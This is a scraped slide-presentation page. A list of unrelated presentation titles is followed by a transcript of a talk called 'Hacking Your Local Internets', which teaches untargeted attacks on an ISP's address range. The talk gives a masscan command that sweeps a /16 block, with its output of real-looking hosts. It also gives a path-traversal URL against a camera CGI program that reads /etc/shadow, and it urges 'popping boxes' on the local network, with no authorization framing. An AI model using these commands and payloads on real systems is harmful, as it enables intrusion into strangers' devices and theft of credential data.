Hacking Your Local Internets

Slides:



Advertisements
Similar presentations
Code-Red : a case study on the spread and victims of an Internet worm David Moore, Colleen Shannon, Jeffery Brown Jonghyun Kim.
Advertisements

CPSC Network Layer4-1 IP addresses: how to get one? Q: How does a host get IP address? r hard-coded by system admin in a file m Windows: control-panel->network->configuration-
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Security Scan melalui Internet Onno W. Purbo
TRUE Blind ip spoofed portscanning Thomas Olofsson C.T.O Defcom.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.
Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.
CS682- Network Management and Security Prof. Katz.
Remote Viewing Setup DVR & IP Video Devices
Network Terminology … Remember: Knowledge is Power!
1 Anti-Hacker Tool Kit Port Scanners Chapter 6. 2 Introduction The first step in the process of hacking –Discover the services –Version label –Operation.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Port Scanners.
CIS 235: Networks Fall, 2007 Western State College Computer Networks Fall, 2007 Prof Peterson.
Port Scanning Yiqian Zhang CS 265 Project. What is Port Scanning? port scanning is equivalent to knocking on the walls to find all the doors and windows.
Computer Security and Penetration Testing
McGraw-Hill©The McGraw-Hill Companies, Inc., 2001 Chapter 24 TCP/IP.
IST 228\Ch3\IP Addressing1 TCP/IP and DoD Model (TCP/IP Model)
Ana Chanaba Robert Huylo
Mohan Kumar Puttasiddaiah
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
Intrusion Detection: Snort. Basics: History Snort was developed in 1998 by Martin Roesch. It was intended to be an open-source technology, and remains.
Web application architecture
Web Page Design I Retest Terms Review. 1. Web pages are created using a language known as ___________. The coding of this language must follow specific.
Port Scanning 0x470~0x480 Presenter SangDuk Seo 1.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.
Module 7: Firewalls and Port Forwarding 1. Overview Firewall configuration for Web Application Hosting Forwarding necessary ports for Web Application.
The instructions about remote access to ip camera IP Cameras need to be accessed remotely through the Internet, we need to do port forwarding settings.
ITIS 1210 Introduction to Web-Based Information Systems Chapter 23 How Web Host Servers Work.
BY OLIVIA WILSON AND BRITTANY MCDONALD Up Your Shields with Shields Up!
CIS 450 – Network Security Chapter 3 – Information Gathering.
The complete picture Linux Network Management. End to End Connection Being able to describe the end to end connection sequence is a useful thing Very.
--Harish Reddy Vemula Distributed Denial of Service.
Scapy. Introduction  It’s a packet manipulation tool.  It can forge or decode packets of a wide number of protocols, send them on the wire, capture.
Port Scanning and Enumeration (NMAP)
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Port Scanners.
Network Assessment How intrusion techniques contribute to system/network security Network and system monitoring System mapping Ports, OS, applications.
Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.
1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.
Advanced Packet Analysis and Troubleshooting Using Wireshark 23AF
Scanning.
WIRESHARK Lab#3. Computer Network Monitoring  Port Scanning  Keystroke Monitoring  Packet sniffers  takes advantage of “friendly” nature of net. 
Remote Access Using a Netgear DG834 Router 1http://
Jen Beveridge and Joe Kolenda. Developed by Gordon Lyon Features –Host discovery –Port scanning –Version detecting –OS detection –Scriptable interaction.
Polytechnic University Firewall and Trusted Systems Presented by, Lekshmi. V. S cos
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Jen Beveridge and Joe Kolenda
Enumeration The First Step.
Port Scanning James Tate II
ETHICAL HACKING WHAT EXACTLY IS ETHICAL HACKING ? By : Bijay Acharya
Introduction to Network Scanning
Footprinting and Scanning
The Linux Operating System
Backdoor Attacks.
Footprinting (definition 1)
Port Scanning (based on nmap tool)
Wireshark Lab#3.
Security Scan melalui Internet
Intro to Ethical Hacking
Client Client 4) Hello , please give me the website
Working at a Small-to-Medium Business or ISP – Chapter 7
Binary Lesson 5 Classful IP Addresses
Intro to Ethical Hacking
Lecture 3: Secure Network Architecture
Linux Server Presentation
4/7/2019 7:12 AM Peer-to-Peer and IPv6 Christian Huitema Architect, Windows Networking Microsoft Corporation.
46 to 1500 bytes TYPE CODE CHECKSUM IDENTIFIER SEQUENCE NUMBER OPTIONAL DATA ICMP Echo message.
Hush Smart Baby Monitor Exploit
EVAPI - Enumeration Auburn Hacking club
Presentation transcript:

Hacking Your Local Internets A guide for monkeys

What are we going after The ISP’s Externally facing IP Addresses Routers Cameras DVR’s Whatever else is out there with an IP

What tools are needed? Linux or Windows Python Masscan or nmap Common words Arin db

What exactly are we doing? Attacking morons and low hanging fruit

Step 1: What’s my ip?

Step 2: What’s the range? So 70.176.0.0/16 is the address range, roughly 64k hosts.

Step 3: Scan! root@joesucks:~# masscan -p80,443,8080,8443,81,4444,4443,8888 70.176.0.0/16 Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-1-4 19:59:13 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 65536 hosts [8 ports/host] Discovered open port 8080/tcp on 70.176.20.39 Discovered open port 443/tcp on 70.176.9.155 Discovered open port 443/tcp on 70.176.155.105 Discovered open port 8080/tcp on 70.176.14.202 Discovered open port 443/tcp on 70.176.38.75 Discovered open port 81/tcp on 70.176.215.126 Discovered open port 443/tcp on 70.176.229.8 Discovered open port 443/tcp on 70.176.215.6 Discovered open port 8080/tcp on 70.176.26.63 Discovered open port 8080/tcp on 70.176.153.41

Step 4: Visit / Probe - this can take forever

Step 5: Format Datas

Step 5.5 Formatting Datas…. Assume I did the same for HTTPS...

Step 6: Code Your Attack

Step 7: Automate that shit

Step 8: Reap the rewards of your fruit

Step 9: Look at the weird stuff on your local CDIR

Step 10: Pop some boxes Classic file abuse in CGI program: http://70.176.24.71:81/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../../../etc/shadow&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=NNNNN&PWD=PPPPP&PIC_SIZE=SSS_SIZE

Now let’s go after the local net here...

Thank you Questions?